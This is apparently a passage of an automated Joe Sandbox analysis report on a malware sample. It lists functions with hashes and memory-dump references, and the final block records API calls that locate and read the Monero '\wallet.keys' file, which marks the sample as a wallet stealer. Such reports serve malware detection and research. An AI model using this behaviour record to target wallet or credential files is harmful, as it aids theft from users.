                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: !FW_
                                        • API String ID: 0-1140023747
                                        • Opcode ID: ac41cbc447c2d2196e7455f61c0f0a3e9dea8f0f989efbb44d220e2eb456659d
                                        • Instruction ID: f32bef3db2e44f1051d2c19dd7b44fa727ba015a0b1a2e55c465f54fb0c87042
                                        • Opcode Fuzzy Hash: ac41cbc447c2d2196e7455f61c0f0a3e9dea8f0f989efbb44d220e2eb456659d
                                        • Instruction Fuzzy Hash: 424188B3A083005BE3446E3EDC8837ABBD6EFC4320F1A803CDAC487745D93969458292
                                        Function 00E0F5B2 Relevance: .4, Instructions: 446COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c4484befffa106554ee197a12d7973bf7b316ca91270e2b79231356b787d8b9
                                        • Instruction ID: 711353f9a901797c897aabe6571a48236e637d583d844c5cdaf1d74379f99811
                                        • Opcode Fuzzy Hash: 8c4484befffa106554ee197a12d7973bf7b316ca91270e2b79231356b787d8b9
                                        • Instruction Fuzzy Hash: 75E1D4F3A082109FE304AF2DDC8576AFBE9EF94720F16892DEAC4D7744E63558448687
                                        Function 00CDB787 Relevance: .2, Instructions: 222COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4a9153b81a51fd0484fff8306d7294c7d9efe1137d66161f846f45b1ed6cd167
                                        • Instruction ID: 24bd44828e8100ce0dcd8af96e818f00133a76052e8217f23002e1609cf9c0ed
                                        • Opcode Fuzzy Hash: 4a9153b81a51fd0484fff8306d7294c7d9efe1137d66161f846f45b1ed6cd167
                                        • Instruction Fuzzy Hash: C26148F3A092109FE3046A2DDC9537AB7DADB98324F2B463DDAD5D37C0E9756C008686
                                        Function 00DA895A Relevance: .2, Instructions: 217COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99fc03c0638eeb7d679bf88e926e44f2d516c79583c51f3ad960527fe7410d28
                                        • Instruction ID: 44dbd1abdc548a14db72583cd4650cea591e1c698f7cce3354a3481151d5826a
                                        • Opcode Fuzzy Hash: 99fc03c0638eeb7d679bf88e926e44f2d516c79583c51f3ad960527fe7410d28
                                        • Instruction Fuzzy Hash: 056125F3A183149FE3042E29DC857BABBD9EB54320F16463DDBC487784E976584487C6
                                        Function 00CF1263 Relevance: .2, Instructions: 183COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93c694cca2872a7b94310ebfce96859bd35b769be13677b5bcd1b5681bb366ec
                                        • Instruction ID: d2bf2c72f4f2930eea70c9770c7e1f4ee28ab6908c3b8bf96adbff844b5ae601
                                        • Opcode Fuzzy Hash: 93c694cca2872a7b94310ebfce96859bd35b769be13677b5bcd1b5681bb366ec
                                        • Instruction Fuzzy Hash: 27514BB3A182195FF308AE2DEC41B76B7D9EB84321F1A453DEA84C7784E9355C0186CA
                                        Function 00EB6653 Relevance: .2, Instructions: 182COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f08371af12ffa20327b955e8c35cf763c485f360f87b4f480567c4a88087d54
                                        • Instruction ID: 07eaea956dd5c82bd17557d9a79f1378ac3c03759e73b29a3a55e4de70e24fa8
                                        • Opcode Fuzzy Hash: 2f08371af12ffa20327b955e8c35cf763c485f360f87b4f480567c4a88087d54
                                        • Instruction Fuzzy Hash: 8D5122F390C610DBD3096A28DC456FBB7E5EF94310F26453EEAC667204EA79180197C3
                                        Function 00DC3C5D Relevance: .2, Instructions: 159COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ccc0953099c1517eb13cde843ae43c55e3ce36000d44f17b1f31de48788023b
                                        • Instruction ID: 88aeb6cfbd523619e40827c34012a103ab4859502716eba1f2bb0cd09588ac3c
                                        • Opcode Fuzzy Hash: 0ccc0953099c1517eb13cde843ae43c55e3ce36000d44f17b1f31de48788023b
                                        • Instruction Fuzzy Hash: 085136F3A086049BF3086A29EC4577BB7DAEFD0310F1AC93DE78543B84E93959118686
                                        Function 00EBB156 Relevance: .1, Instructions: 149COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8e4edd508ca09280baecad12bf104fe44bf3b33e641d252f7b3d302b6d22159
                                        • Instruction ID: 487723a61457aa2da1fddc1a839b395e84a0d062444919b408760bcd8d0993e1
                                        • Opcode Fuzzy Hash: a8e4edd508ca09280baecad12bf104fe44bf3b33e641d252f7b3d302b6d22159
                                        • Instruction Fuzzy Hash: 5741AFF250C604DFD3056E69D8956FFBBE5EF94310F22582DD2C6A3220E7B18451AB47
                                        Function 00CE3260 Relevance: .1, Instructions: 110COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eeec325ac6c28a8c40c9422e162ffda2cef9e6ea71b0a083dd647c12b3506d21
                                        • Instruction ID: 578c3c67f81225ee82d204ee48a5e0b73b632e94640cd99493dca0af0994eb2e
                                        • Opcode Fuzzy Hash: eeec325ac6c28a8c40c9422e162ffda2cef9e6ea71b0a083dd647c12b3506d21
                                        • Instruction Fuzzy Hash: 98313CF3E082149BE318AE28DC8077AF3D6EB94310F1B853DDDC957780E93A5C048686
                                        Function 00EB5802 Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fcf72001bcc0294d79660362d40fdbcf7868808b16175e029baed0ef1a8ff3bb
                                        • Instruction ID: a171c051aa09555ff943b03df382748667d5126b70ac9aed423f9615e6968060
                                        • Opcode Fuzzy Hash: fcf72001bcc0294d79660362d40fdbcf7868808b16175e029baed0ef1a8ff3bb
                                        • Instruction Fuzzy Hash: B4217FB251C304AFE315FF69DC82BBABBE5EB58360F05892DE6D4C2640E63594008A97
                                        Function 00D4F413 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8baa0a6659c27ea7f487980db080c79c99acbffbdb36184f1c9a6deb47162a1d
                                        • Instruction ID: 966e5d0c91bf6b6ec0902002bef9e2c784f855ca0b7e6b3abf953d5917d33d48
                                        • Opcode Fuzzy Hash: 8baa0a6659c27ea7f487980db080c79c99acbffbdb36184f1c9a6deb47162a1d
                                        • Instruction Fuzzy Hash: 6E1127B3FA051947F7484829DD4479B658397D4324F2FC9388A89977C9E8BEE84A1284
                                        Function 00A59750 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        Function 00A50250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A58E0B
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A499EC
                                          • Part of subcall function 00A499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A49A11
                                          • Part of subcall function 00A499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A49A31
                                          • Part of subcall function 00A499C0: ReadFile.KERNEL32(000000FF,?,00000000,00A4148F,00000000), ref: 00A49A5A
                                          • Part of subcall function 00A499C0: LocalFree.KERNEL32(00A4148F), ref: 00A49A90
                                          • Part of subcall function 00A499C0: CloseHandle.KERNEL32(000000FF), ref: 00A49A9A
